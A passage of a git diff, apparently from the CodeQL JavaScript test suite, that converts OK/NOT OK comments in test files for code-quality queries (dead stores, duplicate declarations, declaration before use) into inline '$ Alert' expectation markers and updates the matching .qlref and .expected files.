key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref index fc7a36de5226..5bef6c78f6a8 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref @@ -1 +1,2 @@ -Declarations/ConflictingFunctions.ql \ No newline at end of file +query: Declarations/ConflictingFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js index 5b6ec033a8ad..4ab06d946b95 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js @@ -1,6 +1,6 @@ function f(x) { if (x > 23) { - function g() { + function g() { // $ Alert return 42; } } else { diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref index e24cf1256f74..7ccb2ebe73ef 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfGlobal.ql \ No newline at end of file +query: Declarations/DeadStoreOfGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..5dc730c2d4c5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,23 @@ -// NOT OK -g = 23; +g = 23; // $ Alert -// OK h = 23; alert(h); -// OK uid = 0; function incr() { return uid++; } -// OK function foo() { var x; x = 0; } -// OK onload = function() {} -// OK global = 42; -// OK prop = 42; -// OK /*global otherGlobal*/ -otherGlobal = 56; \ No newline at end of file +otherGlobal = 56; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js index d8fec2d35077..d7baebc8443c 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js @@ -1,3 +1,3 @@ onmessage = function() { console.log("Got a message!"); }; -onmissage = function() { console.log("How did that happen?"); }; \ No newline at end of file +onmissage = function() { console.log("How did that happen?"); }; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected @@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref index eb773fe0490a..9c9da7e09a35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfLocal.ql \ No newline at end of file +query: Declarations/DeadStoreOfLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js @@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts @@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..31d321711cfa 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,18 +35,18 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } @@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -129,12 +127,12 @@ function v() { } !function(o) { - var {x} = o; + var {x} = o; // $ Alert x = 42; return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; @@ -169,7 +167,7 @@ function v() { (function() { if (something()) { - var nSign = foo; + var nSign = foo; // $ Alert } else { console.log(nSign); } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..542e9ac06c35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js @@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { @@ -16,15 +16,14 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { - x = 42; + x = 42; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref index 448709b9054f..935b07264eb8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfProperty.ql \ No newline at end of file +query: Declarations/DeadStoreOfProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..0c82a9884b44 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { @@ -82,57 +82,57 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; var o = { set setter(value) { } }; - o.setter = 42; // probably OK, but still flagged - it seems fishy + o.setter = 42; // $ Alert - probably OK, but still flagged - it seems fishy o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref index a017c3bc5aad..cff8cc1360ff 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref @@ -1 +1,2 @@ -Declarations/DeclBeforeUse.ql +query: Declarations/DeclBeforeUse.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js @@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref index da8c0e499f5f..25a417d4cc8c 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref @@ -1 +1,2 @@ -Declarations/DefaultArgumentReferencesNestedFunction.ql \ No newline at end of file +query: Declarations/DefaultArgumentReferencesNestedFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js index 4696ab7b54c3..652af0051b51 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js @@ -1,4 +1,4 @@ -function f(x, y = defaultVal(x)) { +function f(x, y = defaultVal(x)) { // $ Alert function defaultVal(x) { return x+19; } diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref index f3b921510036..464ae67871c4 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref @@ -1 +1,2 @@ -Declarations/DuplicateVarDecl.ql \ No newline at end of file +query: Declarations/DuplicateVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref index 6c8915bdd08c..33e0ddb6ffe1 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref @@ -1 +1,2 @@ -Declarations/IneffectiveParameterType.ql +query: Declarations/IneffectiveParameterType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts index 5aadd17c4d58..a9713de9685e 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts @@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); 